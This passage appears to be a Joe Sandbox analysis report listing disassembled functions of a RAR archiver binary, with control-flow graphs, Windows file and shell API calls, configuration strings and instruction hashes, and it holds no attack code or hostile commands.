                                                                                                                                                                      control_flow_graph 1715 7ff7d79c7a5b-7ff7d79c7a5e 1716 7ff7d79c7a60-7ff7d79c7a66 1715->1716 1717 7ff7d79c7a68 1715->1717 1716->1717 1718 7ff7d79c7a6b-7ff7d79c7a7c 1716->1718 1717->1718 1719 7ff7d79c7aa8 1718->1719 1720 7ff7d79c7a7e-7ff7d79c7a81 1718->1720 1723 7ff7d79c7aab-7ff7d79c7ab8 1719->1723 1721 7ff7d79c7a83-7ff7d79c7a86 1720->1721 1722 7ff7d79c7a88-7ff7d79c7a8b 1720->1722 1721->1719 1721->1722 1726 7ff7d79c7aa4-7ff7d79c7aa6 1722->1726 1727 7ff7d79c7a8d-7ff7d79c7a90 1722->1727 1724 7ff7d79c7aba-7ff7d79c7abd 1723->1724 1725 7ff7d79c7ac8-7ff7d79c7acb 1723->1725 1724->1725 1728 7ff7d79c7abf-7ff7d79c7ac6 1724->1728 1729 7ff7d79c7acf-7ff7d79c7ad1 1725->1729 1726->1723 1727->1719 1730 7ff7d79c7a92-7ff7d79c7a99 1727->1730 1728->1729 1731 7ff7d79c7ad3-7ff7d79c7ae6 1729->1731 1732 7ff7d79c7b2a-7ff7d79c7bb0 call 7ff7d79e1d34 call 7ff7d79c3f04 1729->1732 1730->1726 1733 7ff7d79c7a9b-7ff7d79c7aa2 1730->1733 1734 7ff7d79c7b0a-7ff7d79c7b27 1731->1734 1735 7ff7d79c7ae8-7ff7d79c7af2 call 7ff7d79d9be0 1731->1735 1744 7ff7d79c7bb2-7ff7d79c7bba 1732->1744 1745 7ff7d79c7bbc 1732->1745 1733->1719 1733->1726 1734->1732 1739 7ff7d79c7af7-7ff7d79c7b02 1735->1739 1739->1734 1744->1745 1746 7ff7d79c7bbf-7ff7d79c7bc9 1744->1746 1745->1746 1747 7ff7d79c7bda-7ff7d79c7c06 call 7ff7d79cb540 1746->1747 1748 7ff7d79c7bcb-7ff7d79c7bd5 call 7ff7d79e1e1c 1746->1748 1752 7ff7d79c7c40 1747->1752 1753 7ff7d79c7c08-7ff7d79c7c0f 1747->1753 1748->1747 1755 7ff7d79c7c44-7ff7d79c7c5a call 7ff7d79caa68 1752->1755 1753->1752 1754 7ff7d79c7c11-7ff7d79c7c14 1753->1754 1754->1752 1757 7ff7d79c7c16-7ff7d79c7c2b 1754->1757 1760 7ff7d79c7c85-7ff7d79c7c97 call 7ff7d79cb540 1755->1760 1761 7ff7d79c7c5c-7ff7d79c7c6a 1755->1761 1757->1755 1759 7ff7d79c7c2d-7ff7d79c7c3e call 7ff7d7a19b98 1757->1759 1759->1755 1767 7ff7d79c7c9c-7ff7d79c7c9f 1760->1767 1761->1760 1763 7ff7d79c7c6c-7ff7d79c7c7e call 7ff7d79c8d98 1761->1763 1763->1760 1769 7ff7d79c7ca5-7ff7d79c7cfb call 7ff7d79f9354 call 7ff7d79e6378 * 2 1767->1769 1770 7ff7d79c7fa4-7ff7d79c7fbe 1767->1770 1777 7ff7d79c7d17-7ff7d79c7d1f 1769->1777 1778 7ff7d79c7cfd-7ff7d79c7d10 call 7ff7d79c5414 1769->1778 1780 7ff7d79c7de2-7ff7d79c7de6 1777->1780 1781 7ff7d79c7d25-7ff7d79c7d28 1777->1781 1778->1777 1783 7ff7d79c7de8-7ff7d79c7e49 call 7ff7d79f98dc 1780->1783 1784 7ff7d79c7e4e-7ff7d79c7e68 call 7ff7d79f9958 1780->1784 1781->1780 1785 7ff7d79c7d2e-7ff7d79c7d36 1781->1785 1783->1784 1793 7ff7d79c7e6a-7ff7d79c7e84 1784->1793 1794 7ff7d79c7e8b-7ff7d79c7e8e 1784->1794 1788 7ff7d79c7d59-7ff7d79c7d6a call 7ff7d7a1a444 1785->1788 1789 7ff7d79c7d38-7ff7d79c7d49 call 7ff7d7a1a444 1785->1789 1797 7ff7d79c7d78-7ff7d79c7dc6 1788->1797 1798 7ff7d79c7d6c-7ff7d79c7d77 call 7ff7d79ecf8c 1788->1798 1801 7ff7d79c7d57 1789->1801 1802 7ff7d79c7d4b-7ff7d79c7d56 call 7ff7d79e8ae8 1789->1802 1793->1794 1799 7ff7d79c7e90-7ff7d79c7e9a call 7ff7d79f9990 1794->1799 1800 7ff7d79c7e9f-7ff7d79c7eb8 call 7ff7d79c1204 1794->1800 1797->1780 1823 7ff7d79c7dc8-7ff7d79c7de1 call 7ff7d79c1314 call 7ff7d7a1ba34 1797->1823 1798->1797 1799->1800 1813 7ff7d79c7ec8-7ff7d79c7ed9 call 7ff7d79f941c 1800->1813 1801->1797 1802->1801 1817 7ff7d79c7eba-7ff7d79c7ec3 call 7ff7d79f9680 1813->1817 1818 7ff7d79c7edb-7ff7d79c7f9f call 7ff7d79c1400 call 7ff7d79e6424 call 7ff7d79cb540 1813->1818 1817->1813 1818->1770 1823->1780
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: H9
                                                                                                                                                                      • API String ID: 0-2207570329
                                                                                                                                                                      • Opcode ID: 76be0bccc8992e044992f088c63ebd5045fb2f71f59da23dc14515355945cf31
                                                                                                                                                                      • Instruction ID: 990573623ce80c3e3a1399e2d8e48e07e2312fd59dd07ff1da11bc381d0a6378
                                                                                                                                                                      • Opcode Fuzzy Hash: 76be0bccc8992e044992f088c63ebd5045fb2f71f59da23dc14515355945cf31
                                                                                                                                                                      • Instruction Fuzzy Hash: A8E1B0A3A09A9385EF14EB25E048AFD63A9EB4574CFC94436DE4D03785DF38E546CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E2574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1858 7ff7d79e2574-7ff7d79e259c 1859 7ff7d79e25a5-7ff7d79e25a9 1858->1859 1860 7ff7d79e259e-7ff7d79e25a0 1858->1860 1862 7ff7d79e25ab-7ff7d79e25b6 GetStdHandle 1859->1862 1863 7ff7d79e25ba-7ff7d79e25c6 1859->1863 1861 7ff7d79e273a-7ff7d79e2756 1860->1861 1862->1863 1864 7ff7d79e25c8-7ff7d79e25cd 1863->1864 1865 7ff7d79e2619-7ff7d79e2637 WriteFile 1863->1865 1866 7ff7d79e2644-7ff7d79e2648 1864->1866 1867 7ff7d79e25cf-7ff7d79e2609 WriteFile 1864->1867 1868 7ff7d79e263b-7ff7d79e263e 1865->1868 1870 7ff7d79e2733-7ff7d79e2737 1866->1870 1871 7ff7d79e264e-7ff7d79e2652 1866->1871 1867->1866 1869 7ff7d79e260b-7ff7d79e2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff7d79e2617 1869->1872 1870->1861 1871->1870 1873 7ff7d79e2658-7ff7d79e2692 GetLastError call 7ff7d79e3144 SetLastError 1871->1873 1872->1868 1878 7ff7d79e2694-7ff7d79e26a2 1873->1878 1879 7ff7d79e26bc-7ff7d79e26d0 call 7ff7d79dc95c 1873->1879 1878->1879 1880 7ff7d79e26a4-7ff7d79e26ab 1878->1880 1885 7ff7d79e26d2-7ff7d79e26db 1879->1885 1886 7ff7d79e2721-7ff7d79e272e call 7ff7d79dcf14 1879->1886 1880->1879 1882 7ff7d79e26ad-7ff7d79e26b7 call 7ff7d79dcf34 1880->1882 1882->1879 1885->1863 1888 7ff7d79e26e1-7ff7d79e26e3 1885->1888 1886->1870 1888->1863 1889 7ff7d79e26e9-7ff7d79e271c 1888->1889 1889->1863
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3350704910-0
                                                                                                                                                                      • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                      • Instruction ID: 8b313fc5e86e414e7a614bd11b829bcdcccc58ff4d4476da42425cd31044356c
                                                                                                                                                                      • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                      • Instruction Fuzzy Hash: C9519323609A5287EA28EF25E51437EA761FB85B48FD40137DA4E46A91CF3CE547C610
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E1E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1894 7ff7d79e1e80-7ff7d79e1ebb call 7ff7d7a1a5a0 1897 7ff7d79e1ebd-7ff7d79e1ec1 1894->1897 1898 7ff7d79e1ec8 1894->1898 1897->1898 1899 7ff7d79e1ec3-7ff7d79e1ec6 1897->1899 1900 7ff7d79e1ecb-7ff7d79e1f57 CreateFileW 1898->1900 1899->1900 1901 7ff7d79e1fcd-7ff7d79e1fd1 1900->1901 1902 7ff7d79e1f59-7ff7d79e1f76 GetLastError call 7ff7d79f4534 1900->1902 1904 7ff7d79e1fd3-7ff7d79e1fd7 1901->1904 1905 7ff7d79e1ff7-7ff7d79e200f 1901->1905 1912 7ff7d79e1f78-7ff7d79e1fb6 CreateFileW GetLastError 1902->1912 1913 7ff7d79e1fba 1902->1913 1904->1905 1906 7ff7d79e1fd9-7ff7d79e1ff1 SetFileTime 1904->1906 1907 7ff7d79e2011-7ff7d79e2022 call 7ff7d7a0a9e8 1905->1907 1908 7ff7d79e2027-7ff7d79e204b call 7ff7d7a1a610 1905->1908 1906->1905 1907->1908 1912->1901 1915 7ff7d79e1fb8 1912->1915 1916 7ff7d79e1fbf-7ff7d79e1fc1 1913->1916 1915->1916 1916->1901 1917 7ff7d79e1fc3 1916->1917 1917->1901
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                      • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction ID: 972b7486cee502bcb086aac82cdd3a61a2ead1bf6e949d907ae71673e92e5d00
                                                                                                                                                                      • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B414773A1928246F7649F24E405BAEA690A7857BCFC00736DE7D076C4CF7CC4868B50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                      • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction ID: 283abfb54c2ac0707062232b37635e06e685c8f71dd3634db41a384e499bf7f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 9041BF22A1868281EB14FB25D4505FDA7A0FB957E8FC40537EA5D07ADAEF3CE512C320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                      • String ID: rar.lng
                                                                                                                                                                      • API String ID: 553376247-2410228151
                                                                                                                                                                      • Opcode ID: 914d14762cae288d140f1134fa55e4e0cffa9b1535581c7d3ed19b5fc0911dd0
                                                                                                                                                                      • Instruction ID: 56403066ca03e2efab5239cfb95170f08b395c88612e8ae769e99926865ce8af
                                                                                                                                                                      • Opcode Fuzzy Hash: 914d14762cae288d140f1134fa55e4e0cffa9b1535581c7d3ed19b5fc0911dd0
                                                                                                                                                                      • Instruction Fuzzy Hash: A4418122E0C28345FB18BB28A8565BDE7A19F81759FD80537E90E072D7CE2DE4078770
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetMalloc.SHELL32(?,00000800,?,00007FF7D79F4432,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F40C4
                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F40DF
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32 ref: 00007FF7D79F40F1
                                                                                                                                                                        • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7D79F413F,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E34A0
                                                                                                                                                                        • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7D79F413F,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E34D5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                      • String ID: WinRAR
                                                                                                                                                                      • API String ID: 977838571-3970807970
                                                                                                                                                                      • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                      • Instruction ID: 2ef34f6fe5bd0f05c975c29ea72fc5baa2f601523b6f76ea08bcd8f369aec978
                                                                                                                                                                      • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C219F13B08A4381FA14AF26F8401BED361AF9ABD4BE85032DF4E47765DE3CD0468750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2244327787-0
                                                                                                                                                                      • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                      • Instruction ID: 5c6e8107cf57fbdd852fa8d08f62732f3d03d2983045eb457803998451217b45
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 7821AE22E4D54782EB64AB25E00037EE3A1BB45B98FD00133EA5D876C4CF2CD8C2C721
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
